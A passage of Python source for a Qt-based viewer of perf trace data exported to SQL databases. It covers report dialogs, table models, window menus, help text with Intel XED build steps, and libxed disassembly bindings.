return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip() ,value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox);
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = ""):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT * FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would be always 1, is replaced by the 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
win = self.mdi_area.activeSubWindow()
ShrinkFont(win.view)
def EnlargeFont(self):
win = self.mdi_area.activeSubWindow()
EnlargeFont(win.view)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda x=dbid: self.NewSelectedBranchView(x), self))
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
pos = f.tell()
